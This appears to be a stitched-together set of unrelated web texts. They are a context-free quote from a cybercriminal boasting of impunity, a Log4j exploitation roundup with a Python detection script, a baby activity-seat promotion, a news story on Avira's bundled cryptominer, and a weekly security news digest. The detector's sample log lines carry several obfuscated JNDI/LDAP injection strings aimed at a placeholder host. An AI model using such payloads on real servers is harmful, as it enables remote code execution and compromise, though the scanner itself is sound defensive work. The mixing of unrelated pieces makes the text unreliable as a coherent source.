“I’ve had some business with Bugatti,” Wazawaka said. “The guy got too rich and began recruiting Americans as affiliate partners. What happened now is the result. That’s okay, though. I wish Bugatti to do some rebranding and start from the beginning 🙂 As for the servers that were seized, they should’ve hosted their admin panels in Russia to avoid getting their servers seized by INTERPOL, the FBI, or whatever.”

“Mother Russia will help you,” Wazawaka concluded. “Love your country, and you will always get away with everything.”


Log4j One Month On | Crimeware and Exploitation Roundup

It has been 31 days since the initial public disclosure of a remote code execution (RCE) critical vulnerability in the Apache Log4j logging library that upended enterprise security at the close of 2021. In that time, since the initial CVE-2021-44228 (critical), we’ve already seen five more related CVEs:

  • CVE-2021-45046 (critical)
  • CVE-2021-4104 (high)
  • CVE-2021-42550 (moderate)
  • CVE-2021-45105 (moderate)
  • CVE-2021-44832 (moderate)

and several updates to the library, from 2.15.0 on December 9th to 2.17.1 on December 28th.

The importance of this class of vulnerabilities in such a ubiquitous library must not be forgotten with the next spin of the cyber news cycle: with millions of vulnerable devices, attacks are likely to continue for as long as such devices running unpatched software can be found by threat actors.

In this post, we round up all the activity to date concerning Log4Shell exploits to underscore the importance of timely discovery and patching of affected systems.

Log4j Initial Impact | Criminals and Researchers Equally Alert

As described in more detail here, there are two novel characteristics of a Log4j attack:

  1. The attacking string can be injected into any user input that will be logged, such as an HTTP header, a username, or a file name.
  2. The server the attacker communicates with and the server being attacked can be completely different and even located within different networks. In this case, internal logging servers located within trusted networks can suddenly communicate with attackers on the internet.

These characteristics provide a simple and potent tool, and it took less than 24 hours after public disclosure of CVE-2021-44228 for attackers to generate over 60 permutations of the attack string.
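The two characteristics above tell a defender where to look: in whatever the application actually logged, after Log4j’s nested `${...}` lookups have been resolved, since a literal match on `${jndi:` misses the permutations. The following is an added example (not SentinelOne’s code) that resolves the offline-evaluable nesting forms in constructed access-log lines and flags the ones that still carry a JNDI lookup; the IPs and the `lookup.invalid` hostname are made up.

```python
"""Flag Log4Shell-style JNDI lookups in logged request data.

Added example for this roundup, not SentinelOne's code. Log4j 2.x resolves
${...} lookups recursively, so a plain substring match for "${jndi:" misses
nested permutations. This normaliser resolves the innermost lookup forms
that can be evaluated offline, then checks whether a JNDI lookup remains.
"""
import re

# Innermost lookup: a ${...} whose body contains no further braces.
_LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")
_CASE = {"lower": str.lower, "upper": str.upper}


def _resolve_one(body):
    """Evaluate one innermost lookup body the way Log4j 2.x would."""
    if ":-" in body:                       # ${key:-default} -> default
        return body.split(":-", 1)[1]
    key, sep, arg = body.partition(":")
    if sep and key.lower() in _CASE:       # ${lower:X} / ${upper:x}
        return _CASE[key.lower()](arg)
    # env/sys/date/... need a live runtime; treat as empty so the
    # surrounding text stays inspectable.
    return ""


def normalize(text, max_rounds=50):
    """Return (normalised text, jndi_seen).

    Innermost lookups are resolved repeatedly; a JNDI lookup is replaced
    by a <JNDI> marker instead of being "resolved". The round cap keeps
    pathological inputs from spinning forever.
    """
    jndi_seen = False
    for _ in range(max_rounds):
        m = _LOOKUP_RE.search(text)
        if not m:
            break
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            jndi_seen = True
            text = text[:m.start()] + "<JNDI>" + text[m.end():]
        else:
            text = text[:m.start()] + _resolve_one(body) + text[m.end():]
    return text, jndi_seen


def scan_log_lines(lines):
    """Return [(line_no, raw_line, normalised_line)] for lines carrying JNDI."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm, seen = normalize(line)
        if seen:
            hits.append((n, line, norm))
    return hits


# Constructed access-log lines (made-up hosts and addresses); the payload
# shapes follow the nesting forms the lookup syntax allows.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://lookup.invalid/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:02:31 +0000] '
    '"GET /login?user=${${lower:j}${upper:n}di:ldap://lookup.invalid/b} HTTP/1.1" 200 "-" "-"',
    '10.0.0.9 - - [12/Dec/2021:10:03:00 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${env:NOPE:-j}ndi:${::-l}dap://lookup.invalid/c}"',
    '10.0.0.11 - - [12/Dec/2021:10:04:00 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, raw, norm in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

The last sample line shows why normalisation matters in the other direction too: a benign `${date:yyyy}` lookup is resolved away and not reported.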

Within hours of the public disclosure, we saw discussion and adoption of the issue within well-known underground Russian crime forums.

RU forum discussions

Researchers in the Chinese hacking community also claimed to have seen evidence of fast, automated exploitation tools such as Log4j_RCE_Tool, reverse-shell PoCs, and an increasing number of articles on exploiting additional JNDI vulnerabilities in IBM WebLogic servers.

Meanwhile, researchers found that their Log4j honeypots were lighting up with alarming speed within 24 hours of the initial disclosure.

December 2021 | Log4Shell Attacks In the Wild

The first wave of attacks using the Log4Shell exploit came from relatively unsophisticated actors dropping various cryptominers on victims. Perhaps most audacious of these was a reported 8-day long hack of HP AMD-based 9000 EPYC servers that was used to mine around 3.4 million Raptoreum coins, with an approximate value of $110,000. It is thought that the attackers were able to cash out about half of the coins they mined before the operation was shut down.

Miner attacks were quickly followed by the appearance of a number of new ransomware families taking advantage of Log4j as a means of initial access, such as Khonsari ransomware. Attackers exploited Log4j to download and launch a malicious Java class file, which then retrieved the Khonsari ransomware payload from a C2.

Additional ransomware families soon followed, including TellYouThePass. This family had been relatively dormant prior to the Log4j vulnerability disclosure. TellYouThePass has both Windows and Linux variants, allowing it to attack the majority of servers likely to be vulnerable to Log4j exploitation.

Conti Attacks Log4j-Vulnerable Devices Not Exposed to the Public Internet

Within days of the flaw being disclosed, Conti ransomware campaigns were reportedly observed taking advantage of the vulnerability, with multiple campaigns focused on high-value vCenter environments. This development is noteworthy as the target machines were not necessarily exposed to the public internet. Rather, where the Conti operators had already gained an initial foothold into a target’s network, they exploited Log4j to compromise and encrypt vulnerable vCenter servers within the network.

Naturally, the Emotet crew has been taking advantage of Log4j as well. For example, vulnerable servers were quickly compromised and used for staging and payload hosting within the greater Emotet network. While we fully expect Emotet to embrace Log4j for direct delivery, we have yet to observe this development. However, we do currently see the use of Log4j to deliver Cobalt Strike Beacons, which can then be followed by any number of payloads.

In mid-December, Vietnamese crypto-exchange ONUS was attacked via exploitation of Log4j. The attack likely occurred within two to three days of the initial Log4j disclosure. The company patched their vulnerable servers sometime after the 13th of December, by which time the company had already been breached. The attackers later attempted to extort the company out of $5 million. For that amount, the attackers offered not to leak a cache of stolen data including PII. After the Fintech firm refused to pay, the attackers attempted to sell this data on a well-known hacking forum on December 25th:

Hackers try to sell data from log4j compromise

Ransomware operators and extortionists are not the only ones getting in on the action. The actors behind Dridex have also expediently adopted the use of this exploit for their own nefarious purposes. In mid to late December, we saw mass distribution of Dridex by way of Log4j. In most cases, the exploit was used to load a malicious Java class, followed by a .HTA file containing a VBScript. From there we see more of a standard DLL-based flow.

January 2022 | Regulators and CISA Add Pressure to Remediate Log4j

On January 4th, the pressure for enterprises to ensure they have taken appropriate steps to remediate assets running vulnerable Log4j libraries was ramped up even further by the FTC.

Noting that Log4j “poses a severe risk to millions of consumer products” and that the vulnerability is being widely exploited by a growing set of threat actors, the FTC said on January 4 that it will

“use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j”.

Meanwhile, on Jan 6, 2022, CISA noted that, based on submissions to the agency’s catalog, there are at least 2800 distinct products that contain Log4j. The agency estimates that despite the determined action by many admins and security teams during December 2021, there are likely “hundreds of millions” of individual devices still affected by the Log4j vulnerabilities.

What Comes After Log4j?

Log4j could be just the beginning of a whole new class of bugs. It turns out that the JNDI API is very attractive as a means of compromise, as it allows simple unauthenticated remote code execution. A new JNDI-based “Log4j-like” critical vulnerability was disclosed on Jan 7, 2022. Tracked as CVE-2021-42392, this related RCE flaw was discovered in the console of the H2 database, an open-source relational database management system written in Java. Although far from as widespread as the Log4j vulnerability, it is estimated to affect almost 7000 assets, including popular frameworks like JHipster, Play framework and Spring Boot.

Conclusion

Unfortunately for overworked admins and security teams, a new year doesn’t mean an end to old problems, and exploitation of the Log4j and related JNDI vulnerabilities is going to be haunting many defenders for some time to come. Again, we urge all to stay ahead of the Log4j situation and ensure vulnerable software is patched to the latest version of Log4j or removed where that is not possible.

If there’s any silver lining to this dark cloud, it is that in order for threat actors to capitalize on vulnerabilities, they need to engage in malicious behaviour, and that’s where on-device, AI-powered endpoint protection comes into its own. Whether it’s cryptominers or malware loaders, ransomware or banking trojans, deploying an autonomous detection and mitigation solution is an essential part of defending the modern organization from compromise.


Baby Racing Car Seat From Delta Children

You read it right! Delta Children, the company known and loved for their eye-catching baby chairs and accessories, has created something for the little ones who were born with the speed in their veins.

Delta Children Sit N Play Portable Activity Seat for Babies is what you might call a sporty addition to the baby gear family. It is safe, comfortable, sturdy, and perfectly adjustable to any surface.

About Delta Children Portable Activity Chair

The Delta Children Sit N’ Play Portable Activity Seat will help your little one sit, interact, and play at home and on the road. The sturdy upright seat allows your baby to enjoy and interact with the world completely, while the beautiful design will look great in any room. The portable play seat is easy to fold for storage and take along, while the non-skid bottom will keep it secure on nearly any surface.

Your little one will love playing with the engaging race car-themed toys that help increase gross motor skills, and you’ll love how easy it is to clean: just remove the seat pad and pop it in the washing machine. The rest of the activity seat features water-and-stain-resistant fabric that’s easy to wipe clean!

This infant floor seat is perfect for traveling because of its innovative zippered design and convenient carry handle, which unzips to fold flat quickly.

Why choose a baby racing car seat?

Keeping your baby content in one spot is one of the most challenging tasks when it comes to caring for them. Babies love to move around and explore; they’re constantly crawling everywhere, looking for something they can pick up in their little hands, something that will bring them joy and entertainment.

This is where the Delta Children Sit N’ Play Portable Activity Seat comes in to help you. This product will have your child content on any surface, whether it’s at home or outside, on the porch, for example. You can place it anywhere, and your baby will be thrilled playing with the interactive toys that are included.

It is also vital to consider kids’ interests as soon as possible. You don’t want to wait until they’re older and have become bored with the toys you chose for them during their infantile stage. Let them play with what they enjoy, let them be kids while they still can, and once they get a bit older, things will start getting complicated because of what is expected from them in terms of behavior and maturity.

Quality kids’ chairs at your reach

Besides being a practical solution for your child’s entertainment needs, the Delta Children Sit N’ Play Portable Activity Seat is also very affordable. Now you can have a play seat for your infant that won’t break the bank as it costs just as much as other products on the market today.

Delta Children products were mentioned on ComfyBummy numerous times. You can, for example, see reviews for their amazing kids’ Frozen chairs or explore our guide to the Delta Children’s products.

You’ll never go wrong having Delta Children around. Their products are some of the most durable ones you’ll find, not only when it comes to kids’ furniture but also in terms of toys. Their quality is extremely high while their prices are fair enough that everyone can buy their products. You can find them on Amazon, where you can browse their many items and choose the one you like most.


500M Avira Antivirus Users Introduced to Cryptomining

Many readers were surprised to learn recently that the popular Norton 360 antivirus suite now ships with a program which lets customers make money mining virtual currency. But Norton 360 isn’t alone in this dubious endeavor: Avira antivirus — which has built a base of 500 million users worldwide largely by making the product free — was recently bought by the same company that owns Norton 360 and is introducing its customers to a service called Avira Crypto.

Avira Crypto

Founded in 2006, Avira Operations GmbH & Co. KG is a German multinational software company best known for their Avira Free Security (a.k.a. Avira Free Antivirus). In January 2021, Avira was acquired by Tempe, Ariz.-based NortonLifeLock Inc., the same company that now owns Norton 360.

In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019. LifeLock is now included in the Norton 360 service; Avira offers users a similar service called Breach Monitor.

Like Norton 360, Avira comes with a cryptominer already installed, but customers have to opt in to using the service that powers it. Avira’s FAQ on its cryptomining service is somewhat sparse. For example, it doesn’t specify how much NortonLifeLock gets out of the deal (NortonLifeLock keeps 15 percent of any cryptocurrency mined by Norton Crypto).

“Avira Crypto allows you to use your computer’s idle time to mine the cryptocurrency Ethereum (ETH),” the FAQ explains. “Since cryptomining requires a high level of processing power, it is not suitable for users with an average computer. Even with compatible hardware, mining cryptocurrencies on your own can be less rewarding. Your best option is to join a mining pool that shares their computer power to improve their chance of mining cryptocurrency. The rewards are then distributed evenly to all members in the pool.”

NortonLifeLock hasn’t yet responded to requests for comment, so it’s unclear whether Avira uses the same cryptomining code as Norton Crypto. But there are clues that suggest that’s the case. NortonLifeLock announced Avira Crypto in late October 2021, but multiple other antivirus products have flagged Avira’s installer as malicious or unsafe for including a cryptominer as far back as Sept. 9, 2021.

Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.

The above screenshot was taken on Virustotal.com, a service owned by Google that scans submitted files against dozens of antivirus products. The detection report pictured was found by searching Virustotal for “ANvOptimusEnablementCuda,” a function included in the Norton Crypto mining component “Ncrypt.exe.”

Some longtime Norton customers took to NortonLifeLock’s online forum to express horror at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” reads a Dec. 28 thread on Norton’s forum titled “Absolutely furious.”

Others have charged that the crypto offering will end up costing customers more in electricity bills than they can ever hope to gain from letting their antivirus mine ETH. What’s more, there are hefty fees involved in moving any ETH mined by Norton or Avira Crypto to an account that the user can cash out, and many users apparently don’t understand they can’t cash out until they at least earn enough ETH to cover the fees.

In August 2021, NortonLifeLock said it had reached an agreement to acquire Avast, another longtime free antivirus product that also claims to have around 500 million users. It remains to be seen whether Avast Crypto will be the next brilliant offering from NortonLifeLock.

As mentioned in this week’s story on Norton Crypto, I get that participation in these cryptomining schemes is voluntary, but much of that ultimately hinges on how these crypto programs are pitched and whether users really understand what they’re doing when they enable them. But what bugs me most is they will be introducing hundreds of millions of perhaps less savvy Internet users to the world of cryptocurrency, which comes with its own set of unique security and privacy challenges that require users to “level up” their personal security practices in fairly significant ways.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

The Good

It sounds like a tagline for the latest scary film (This week…in a holding cell…THE SPINE COLLECTOR!), but this is no work of fiction. We start 2022 with a breakthrough in a real-life cyber mystery that has been puzzling and plaguing the publishing world for years. On Wednesday, news broke that the FBI had arrested a notorious and elusive cyber thief nicknamed “The Spine Collector” at JFK airport.

Filippo Bernardini, a 29-year-old employee of Simon & Schuster, was arrested and taken into custody on suspicion of wire fraud and aggravated identity theft spanning almost five years. Bernardini is believed to have masqueraded as a plethora of different editors, publishers and others in the literary profession over several years with the goal of stealing unpublished books, novels, and manuscripts, including works by bestselling authors such as Margaret Atwood and Ethan Hawke.

According to the charges filed against him, Bernardini had registered nearly 200 typosquatting domains in order to deliver spear-phishing emails to selected targets in the publishing industry. While the Spine Collector successfully stole hundreds of pieces of work, it seems he never attempted to trade or share the works he pirated, and his precise motivations still remain a mystery at this time.

The Spine Collector’s antics, which began around 2017, had become so widespread within the publishing industry that several amateur sleuths had tried to crack the case. There was widespread speculation and suspicion that the thief was an industry insider, and the whole story makes for a fascinating read itself.

That said, what can we learn from this? Nobody is immune from spear-phishing and social engineering, even when immediate financial risk may not seem to be in play. What motivates criminals and fraudsters can sometimes be factors other than money, but our defenses must be in place all the same.

The Bad

This week also saw disclosure of an attack by the Karakurt group on Tourisme Montréal (aka Visit Montreal), which represents 900 tourism industry stakeholders aiming to promote the Canadian city. The attack, which occurred in December, is just one of a number in a recent uptick in Karakurt activity, all of which are primarily targeting businesses in North America.

A spokesperson for Tourisme Montréal stated that they had immediately retained security experts and that they are working to “ensure the integrity and security of our systems.” Given Karakurt’s MO, concerns remain around whether customer PII has been stolen, and the investigation is ongoing.

An image from the Karakurt leaks site

Karakurt appears to operate under a slightly atypical model. Unlike most ransomware groups, they do not attempt to encrypt victim files and instead focus entirely on exfiltration of data and subsequent extortion. Presumably, the gang has decided that there is plenty of profit to be made without the added hassle of dealing with malware (ransomware) or other tactics that would normally trip the alarms of endpoint security controls or cause service disruptions that might attract attention from the authorities.

Karakurt attacks focus heavily on the use of LOLBins (living-off-the-land binaries) and COTS (Commercial Off-the-Shelf) tools. In addition, Karakurt will rely on tools like AnyDesk or Cobalt Strike for delivery, staging and further lateral movement. The group is also known to purchase access or credentials for target environments (as opposed to initially breaching the target themselves).

Karakurt Extortion note

The takeaway here is that we all need to remain vigilant and keenly observant with regards to the use of non-malware TTPs in extortion attacks. While this is hardly a new message, we cannot remind ourselves too often of the lengths these criminals will go to.

The Ugly

Researchers at Palo Alto have uncovered a formjacking attack in which malicious JavaScript skimmer code is embedded in videos on a website. Other websites that embed the maliciously-crafted video will then in turn become infected with the same skimmer code. Approximately 100 real estate-focused websites appear to have been compromised using this method.

Based on the findings, the skimmer code is designed to extract email addresses, phone numbers, credit card track data and other highly sensitive pieces of data. The attackers then exfiltrate any data obtained to their C2 via HTTP.

All in all a stealthy attack, but far from novel. Unfortunately, attacks don’t have to be shiny and new to work: bad guys will keep reusing whatever gets the job done.

To cap off this week, let’s not forget the ongoing Log4j2 issues (CVE-2021-44228, CVE-2021-44832). At the end of December, Log4j version 2.17.1 was released, which addresses a newly discovered RCE (remote code execution) exploit. This newer vulnerability is tracked as CVE-2021-44832. We urge all to review their current posture with regards to the Log4j vulnerabilities to ensure they are as safe and protected as possible. As always, you can find the most up-to-date information on Log4j on our blog here.